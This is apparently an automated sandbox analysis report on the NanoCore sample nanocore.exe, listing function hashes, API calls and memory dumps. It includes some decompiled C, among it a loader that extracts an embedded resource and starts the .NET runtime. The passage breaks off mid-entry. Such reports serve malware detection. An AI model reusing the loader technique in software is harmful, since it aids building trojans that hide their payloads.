            • Opcode ID: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction ID: 9a19af462094a1157adf0a1695e347c504c30875ce7c89a43b2e01bcf73e6b15
            • Opcode Fuzzy Hash: 680019072755fb7b9246c28769c8d796fd5c75f8e8191a3aa30db9a90a6369eb
            • Instruction Fuzzy Hash: 41D0A7B2409D706EE3031214DC04B8F7A488F17320F0904A2F040A61E5C2780C418BBD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405624, Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405624(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






            0x00405630
            0x00405632
            0x0040565a
            0x0040563f
            0x00405644
            0x0040564f
            0x00000000
            0x0040566c
            0x00405658
            0x00405658
            0x00000000

            APIs
            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040562B
            • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405644
            • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405652
            • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405828,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040565B
            Memory Dump Source
            • Source File: 00000001.00000002.650059089.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000001.00000002.650054712.0000000000400000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650066884.0000000000407000.00000002.00020000.sdmp Download File
            • Associated: 00000001.00000002.650072328.0000000000409000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650095835.000000000077A000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650105904.0000000000784000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650110830.0000000000788000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650125017.0000000000795000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650134230.00000000007A1000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650140530.00000000007A9000.00000004.00020000.sdmp Download File
            • Associated: 00000001.00000002.650146160.00000000007AC000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: lstrlen$CharNextlstrcmpi
            • String ID:
            • API String ID: 190613189-0
            • Opcode ID: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction ID: 467c7d4f976b1c4b769b407f61edba7cefb266b08e25db718ea0bc1606fb1982
            • Opcode Fuzzy Hash: f6e5a91ec7db47e15e60a1c150abbc6d75b5c44b2e203e3a2d493a33770f074b
            • Instruction Fuzzy Hash: 3DF0A736249D91AAC2126B359C04E6F7F94EF92325B68097AF444F2140D73A9C119BBB
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: nanocore.exe PID: 7104 Parent PID: 7064 nanocore.exeCOMMON

            Executed Functions

            Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








            0x0040149f
            0x004014a5
            0x004014a9
            0x004014ec
            0x004014ee
            0x004014ee
            0x004014b7
            0x004014bb
            0x004014c7
            0x004014cd
            0x004014d3
            0x004014d8
            0x004014e0
            0x004014e0
            0x004014d8
            0x004014e6
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CF5F8, Relevance: 1.9, APIs: 1, Instructions: 396COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 4c966f292c9dd4d1353d0c71598efb139eb81479dfbb64927a84cbc5d290a171
            • Instruction ID: c7e1a84f6edefb2527a343997bac379b24ca46fac1c8148df2c2a5eb724c0494
            • Opcode Fuzzy Hash: 4c966f292c9dd4d1353d0c71598efb139eb81479dfbb64927a84cbc5d290a171
            • Instruction Fuzzy Hash: CDF14D34A00209CFDB14DFA9C944BADBBF2BF98304F1585A9E505AF3A1DB75E946CB40
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




            0x00401e22
            0x00401e28

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CB6C0, Relevance: 6.1, APIs: 4, Instructions: 127threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 022CB730
            • GetCurrentThread.KERNEL32 ref: 022CB76D
            • GetCurrentProcess.KERNEL32 ref: 022CB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022CB803
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: dc4f878a6f844b8b8d07357ed4f5165f334a33c8536e9ea12812ae0419b7f556
            • Instruction ID: 244b5ae93fea961959f0720c469ededf4a162e3e83fe4c9394d2b74488c46a3f
            • Opcode Fuzzy Hash: dc4f878a6f844b8b8d07357ed4f5165f334a33c8536e9ea12812ae0419b7f556
            • Instruction Fuzzy Hash: 745174B49042498FDB10CFA9D588BDEFBF1EF49308F2085AAE459A7350C7355845CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CB6D0, Relevance: 6.1, APIs: 4, Instructions: 120threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 022CB730
            • GetCurrentThread.KERNEL32 ref: 022CB76D
            • GetCurrentProcess.KERNEL32 ref: 022CB7AA
            • GetCurrentThreadId.KERNEL32 ref: 022CB803
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID:
            • API String ID: 2063062207-0
            • Opcode ID: 6519ff9532ec9cd8c0533e1873160da2f9f55d20a717bcf7b164d85dde454194
            • Instruction ID: cebdcb0fea825056f3f12ac6611dbb79af3b00807085dbd3f94490b0155116ce
            • Opcode Fuzzy Hash: 6519ff9532ec9cd8c0533e1873160da2f9f55d20a717bcf7b164d85dde454194
            • Instruction Fuzzy Hash: E15143B4E042498FDB10CFA9D588BDEFBF5EB89308F20856AE419A7350D7356844CF65
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







            0x004055c5
            0x004055cf
            0x004055d3
            0x004055e4
            0x004055e8
            0x004055ed
            0x004055f3
            0x004055f8
            0x004055fd
            0x00405602
            0x00405609
            0x004055d5
            0x004055d5
            0x004055d5
            0x00405614

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
            Memory Dump Source
            • Source File: 00000002.00000002.904801478.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: EnvironmentStrings$Free
            • String ID:
            • API String ID: 3328510275-0
            • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
            • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: e23167ce3b3ec823f6bb8cad2710ed9ea0977d8040ba53910b3d6ce05e4b4044
            • Instruction ID: bc804d763c1491e2e10f6a058a428048ed79f5159d2a74f439c1f7cd4ff72db9
            • Opcode Fuzzy Hash: e23167ce3b3ec823f6bb8cad2710ed9ea0977d8040ba53910b3d6ce05e4b4044
            • Instruction Fuzzy Hash: 8A22C578E44205CFDB14CB94D488ABEBFB2FFA9310F1181DAD46267365C736A881CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022C93E8, Relevance: 1.7, APIs: 1, Instructions: 196COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 022C962E
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 2bb5498728e1cd070441fd462e6bb5f4cdb7ef8a46855241c8d04d88a9acf7f1
            • Instruction ID: 7deafc3e0f2714026edb98f44b386c3d8a3174255e966f05da4d53e020463611
            • Opcode Fuzzy Hash: 2bb5498728e1cd070441fd462e6bb5f4cdb7ef8a46855241c8d04d88a9acf7f1
            • Instruction Fuzzy Hash: FE713570A10B058FDB24DF69C4457AAB7F1BF88304F208A2DD58AD7A44D775E84ACF91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C45F5, Relevance: 1.6, APIs: 1, Instructions: 120COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 28b08bb9aa5cde6c1c758cc05dfe92dc48eb992361d678f85bb2b7f9cc28bb8e
            • Instruction ID: 4f82fe966d00ad780543c56d2fe11c18b181cf2b1be1e3e9c647c10d9829b2bc
            • Opcode Fuzzy Hash: 28b08bb9aa5cde6c1c758cc05dfe92dc48eb992361d678f85bb2b7f9cc28bb8e
            • Instruction Fuzzy Hash: E84132B1C04758CFEB20DFA9C8847DDBBB1BF58308F2480AAD509AB251D7B56946CF91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CFBEE, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 03b2d60f69f16afa4169fe8caeb792d651133f7e6d3917a44450784cfc9b3822
            • Instruction ID: 8e8c29507dc09713da45a2de2ceed7e1112682bbf2abde9bbd2b70e327d85660
            • Opcode Fuzzy Hash: 03b2d60f69f16afa4169fe8caeb792d651133f7e6d3917a44450784cfc9b3822
            • Instruction Fuzzy Hash: D551C0B1D103099FDB14CFE9D984ADEBFB1BF88314F24822AE819AB214D7749945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CFBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 022CFD0A
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 10924ce9e25319c3141a77c56a73c95f68989a9c8924dae83dd775da0ed334a1
            • Instruction ID: f9fcd7668c0c03b8a2608478628f51ac5eef57a7acea80e19d41fe2d53cfcb80
            • Opcode Fuzzy Hash: 10924ce9e25319c3141a77c56a73c95f68989a9c8924dae83dd775da0ed334a1
            • Instruction Fuzzy Hash: A841C1B1D103099FDF14CFE9D984ADEBBB5BF48314F24822AE819AB214D7749945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C3474, Relevance: 1.6, APIs: 1, Instructions: 96COMMON
            Download Yara Rule
            APIs
            • CreateActCtxA.KERNEL32(?), ref: 051C46B1
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 4d1d7c8702f030ee58d2680182f8562fe4c485e9467c1d8008d36e51cf365c4f
            • Instruction ID: e86cbfda417d174da39d1fec360ec864abc7e46ead07937964eeb3578440522b
            • Opcode Fuzzy Hash: 4d1d7c8702f030ee58d2680182f8562fe4c485e9467c1d8008d36e51cf365c4f
            • Instruction Fuzzy Hash: 164112B0C08758CBDF24DFA9C884BCEBBB5BF59304F20806AD908AB251D7B56945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C2470, Relevance: 1.6, APIs: 1, Instructions: 93COMMON
            Download Yara Rule
            APIs
            • CallWindowProcW.USER32(?,?,?,?,?), ref: 051C2531
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CallProcWindow
            • String ID:
            • API String ID: 2714655100-0
            • Opcode ID: dd90729ccb7308595b3e7e75c5cfb1af7aaad763796d87b2de3c82ea836378a5
            • Instruction ID: 17566070d8ec6f657c0c54da5408bdb5364b226c57cd908a9c9cc343705d2bdc
            • Opcode Fuzzy Hash: dd90729ccb7308595b3e7e75c5cfb1af7aaad763796d87b2de3c82ea836378a5
            • Instruction Fuzzy Hash: 80411AB8A003058FDB14CF99C448BAABBF6FB98314F148499D559AB321D375A841CBA0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CB888, Relevance: 1.6, APIs: 1, Instructions: 88windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: afbbb19be193088cb8ae9f6e89f6dba553c08eaeacf3b75ad48e0e463fa2dfe9
            • Instruction ID: 762e33d33cfc104ee012c42c798745f9b27b790e21981712b4dd426ba8cbda49
            • Opcode Fuzzy Hash: afbbb19be193088cb8ae9f6e89f6dba553c08eaeacf3b75ad48e0e463fa2dfe9
            • Instruction Fuzzy Hash: E0318C71908389AFDB01CFA9D805BDEBFF4EF19310F04845AE954A7251C3359855DBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CBCF8, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: c85ed8778541cf877c376ca4e728f125752cf2220ae1cbac7f97f09203a258d0
            • Instruction ID: 817c7c008d5782174edbaf18e7535da6bf97eb9323c9f0fed4dd07e7bd0b528b
            • Opcode Fuzzy Hash: c85ed8778541cf877c376ca4e728f125752cf2220ae1cbac7f97f09203a258d0
            • Instruction Fuzzy Hash: 5521D2B5D002499FDB10CFA9D484ADEFFF4EB48314F24811AE958A7250C379A955CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CBD00, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
            Download Yara Rule
            APIs
            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 022CBD87
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: DuplicateHandle
            • String ID:
            • API String ID: 3793708945-0
            • Opcode ID: 9d0db13649acee99ffb64ec23dae719b89a7ec29fdef3e0fac6738a925014c0e
            • Instruction ID: 9d5dd8c449fb3b38d98c191ca7cda313d9609113080ad7b7ea09295850da57bb
            • Opcode Fuzzy Hash: 9d0db13649acee99ffb64ec23dae719b89a7ec29fdef3e0fac6738a925014c0e
            • Instruction Fuzzy Hash: 3E21E3B5D002089FDB10CFA9D484ADEBBF8EB48314F14811AE918A7310C378A944CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022C7EEA, Relevance: 1.6, APIs: 1, Instructions: 57COMMON
            Download Yara Rule
            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 022C7F5D
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID:
            • API String ID: 2492992576-0
            • Opcode ID: c22081e347f45a87822eb6fd15764457a2efe0212ca49fb5b3af8e33a87887f8
            • Instruction ID: 6f0c217820e7e252e0feb5e64bce6c7fce25ee3b8bde72bc2edd399b6dadfc8d
            • Opcode Fuzzy Hash: c22081e347f45a87822eb6fd15764457a2efe0212ca49fb5b3af8e33a87887f8
            • Instruction Fuzzy Hash: 4821DC708087C58FDB11CFE9C8443EABFF8EB0A314F1485AED494A7252C3789606CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022C8768, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 84e4823df0bbd526732a496b66a060c08ba9545c7ba8e6d2380cf69154ade881
            • Instruction ID: 87c5f984bb4f287b2a465b77a86dfbb5176235affd5e7beed87708385726622b
            • Opcode Fuzzy Hash: 84e4823df0bbd526732a496b66a060c08ba9545c7ba8e6d2380cf69154ade881
            • Instruction Fuzzy Hash: 361114B6D042098FDB10CF9AD444BEEFBF4EB88314F54862EE919A7600C375A945CFA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022C9849, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
            Download Yara Rule
            APIs
            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,022C96A9,00000800,00000000,00000000), ref: 022C98BA
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LibraryLoad
            • String ID:
            • API String ID: 1029625771-0
            • Opcode ID: 973762d1f32f33c1aec98e4b7d3aeae7bb89769fe74a259611e8d19adf864f2e
            • Instruction ID: 0c6705f01681e3c27606ebbbbf44a13a3a7d69f576bce0ee1df3751a373f4d91
            • Opcode Fuzzy Hash: 973762d1f32f33c1aec98e4b7d3aeae7bb89769fe74a259611e8d19adf864f2e
            • Instruction Fuzzy Hash: A41103B6D042498FDB10CF9AD444BDEFBF4EB89314F54852ED829A7200C379A946CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CE6D8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00AB53E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: d6624552fb05cb856e15f6ec7612f95e736abbe25496f7e4aab0c678cfa8ec65
            • Instruction ID: 904e6d807cf063aa27d5f419d94a0efd8edbcc12458a5c50fa80af0fa9149704
            • Opcode Fuzzy Hash: d6624552fb05cb856e15f6ec7612f95e736abbe25496f7e4aab0c678cfa8ec65
            • Instruction Fuzzy Hash: 811146B18003498FDB10CF99C485BDEFBF8EB48314F14842AE914A7640D379A545CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CB8E8, Relevance: 1.6, APIs: 1, Instructions: 53windowCOMMON
            Download Yara Rule
            APIs
            • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?), ref: 051CB957
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: CreateFromIconResource
            • String ID:
            • API String ID: 3668623891-0
            • Opcode ID: d9b18283b26d6943008326029a51db6e8066b2d52fb337b2ffc3ed4ce27fb6a7
            • Instruction ID: 9bae0b0a4cfb05c1a2ffd2db9c9cb93571eb03d0845bc19751fd224e94d3923e
            • Opcode Fuzzy Hash: d9b18283b26d6943008326029a51db6e8066b2d52fb337b2ffc3ed4ce27fb6a7
            • Instruction Fuzzy Hash: 461146B1804249DFDB10CFAAD844BDEBFF8EF58320F14841AE954A7210C379A954CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C32D8, Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
            Download Yara Rule
            APIs
            • PostMessageW.USER32(?,00AB53E8,00000000,?), ref: 051CE73D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessagePost
            • String ID:
            • API String ID: 410705778-0
            • Opcode ID: effb532a9e779cac41192fd348398b9a867a0eafd65037f56d4e6fbbb53ae57d
            • Instruction ID: 5a8244c0dd2791062bd4c03ea21a81d34a33677a3c8eec2b086eee6336dd3158
            • Opcode Fuzzy Hash: effb532a9e779cac41192fd348398b9a867a0eafd65037f56d4e6fbbb53ae57d
            • Instruction Fuzzy Hash: EE1116B58003499FDB20CF99C445BEEBBF8FB58310F10846AE954A7240D379A945CBA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CD238, Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,00000018,00000001,?), ref: 051CD29D
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 69ade8f09ee07199e28bfaf6cfd38d982eeeda160cb15d39b9e961d82b0b3841
            • Instruction ID: cdf12d345d2adb99355a9fdbf5b33fd4119eb6891e6b864a1712f338ed421811
            • Opcode Fuzzy Hash: 69ade8f09ee07199e28bfaf6cfd38d982eeeda160cb15d39b9e961d82b0b3841
            • Instruction Fuzzy Hash: 8011F2B59002489FDB20CF99D889BDEFFF8FB58310F10851AE859A7600C375A645CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 022CFE38, Relevance: 1.5, APIs: 1, Instructions: 49COMMON
            Download Yara Rule
            APIs
            • SetWindowLongW.USER32(?,?,?), ref: 022CFE9D
            Memory Dump Source
            • Source File: 00000002.00000002.905582984.00000000022C0000.00000040.00000001.sdmp, Offset: 022C0000, based on PE: false
            Similarity
            • API ID: LongWindow
            • String ID:
            • API String ID: 1378638983-0
            • Opcode ID: d84efdd990bce99d671289a0a21a562e110daa774b24703499de1708c4f31a1a
            • Instruction ID: 1065ad63bbd030888b2f21c6797dc3f6aed508a14310043f1b0504cf0930fab6
            • Opcode Fuzzy Hash: d84efdd990bce99d671289a0a21a562e110daa774b24703499de1708c4f31a1a
            • Instruction Fuzzy Hash: E51136B5D002098FDB10CF99D584BDEFBF4EB48324F20851AD859A7741C374A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CC3D0, Relevance: 1.5, APIs: 1, Instructions: 48windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(00000000,0000020A,?,00000000,?,?,?,?,051C226A,?,00000000,?), ref: 051CC435
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 38d34419894846177a443b811ac67e5ebf6302c8c3d04c295209cba78c311958
            • Instruction ID: 03fbf471fc24b35bf87b017068642a602b3d07dc1a92afe5cc6c7cdec29d8bf2
            • Opcode Fuzzy Hash: 38d34419894846177a443b811ac67e5ebf6302c8c3d04c295209cba78c311958
            • Instruction Fuzzy Hash: 0D1103B58002489FDB10CF99D489BDEFFF8FB58324F50885AE868A7600C375A945CFA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051CA548, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
            Download Yara Rule
            APIs
            • SendMessageW.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 051CBCBD
            Memory Dump Source
            • Source File: 00000002.00000002.909443163.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 5d14829989531930b1854249c49e1b63a321099de860878ae6958a58ebef3297
            • Instruction ID: a42ff150ba1610350a17f4107f5f6849be4bd9051047021dbc6139e0d19f2188
